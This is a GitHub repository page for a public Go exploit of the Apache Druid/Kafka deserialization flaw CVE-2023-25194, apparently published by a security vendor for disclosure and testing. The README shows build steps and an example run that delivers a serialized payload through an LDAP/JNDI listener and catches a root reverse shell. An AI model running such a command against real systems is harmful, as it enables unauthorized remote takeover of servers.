Skip to content
/ cve-2023-25194 Public

A go-exploit for Apache Druid CVE-2023-25194

License

Apache-2.0 license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

vulncheck-oss/cve-2023-25194

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

.gitignore

.gitignore

 
 

Dockerfile

Dockerfile

 
 

LICENSE

LICENSE

 
 

Makefile

Makefile

 
 

README.md

README.md

 
 

cve-2023-25194.go

cve-2023-25194.go

 
 

go.mod

go.mod

 
 

go.sum

go.sum

 
 

Repository files navigation

Apache Druid CVE-2023-25194

CVE-2023-25194 is a deserialization vulnerability affecting Apache Kafka. This go-exploit demonstrates exploiting CVE-2023-25194 against Apache Druid (using Kafka). This type of attack typically requires an LDAP JNDI attacker infrastructure that is normally spread across a couple of tools. However, all of that is built into the go-exploit for ease of exploitation.

Compiling

To build the exploit into a docker image simply:

make docker

If you have a Go build environment handy, you can also just use make:

albinolobster@mournland:~/cve-2023-25194$ make
gofmt -d -w cve-2023-25194.go 
golangci-lint run --fix cve-2023-25194.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-25194_linux-arm64 cve-2023-25194.go

Example Output

albinolobster@mournland:~/cve-2023-25194$ ./build/cve-2023-25194_linux-arm64 -c -e -rhost 10.9.49.88 -lhost 10.9.49.69 -lport 1270 -ldapAddr 10.9.49.69 -httpAddr 10.9.49.69
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting listener on 10.9.49.69:1270"
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8888 ssl=false "ssl auto"=false
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8888
time=2024-03-15T16:02:31.268-04:00 level=VERSION msg="The self-reported version is: 25.0.0" host=10.9.49.88 port=8888 version=25.0.0
time=2024-03-15T16:02:31.268-04:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8888 vulnerable=yes
time=2024-03-15T16:02:31.268-04:00 level=STATUS msg="Starting LDAP server on 10.9.49.69:10389"
time=2024-03-15T16:02:33.271-04:00 level=STATUS msg="Starting HTTP Server on 10.9.49.69:8080"
time=2024-03-15T16:02:33.335-04:00 level=SUCCESS msg="Received a bind request!"
time=2024-03-15T16:02:33.343-04:00 level=SUCCESS msg="Serialized payload sent!"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit completed"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit successfully completed" exploited=true
time=2024-03-15T16:02:33.640-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.88:58928"
time=2024-03-15T16:02:33.640-04:00 level=STATUS msg="Active shell from 10.9.49.88:58928"
bash: cannot set terminal process group (41): Inappropriate ioctl for device
bash: no job control in this shell
root@8e8d1ce79210:/opt/druid# id
id
uid=0(root) gid=0(root) groups=0(root)
root@8e8d1ce79210:/opt/druid#

About

A go-exploit for Apache Druid CVE-2023-25194

Topics

cve-2023-25194 go-exploit

Resources

Readme

License

Apache-2.0 license
Activity
Custom properties

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Languages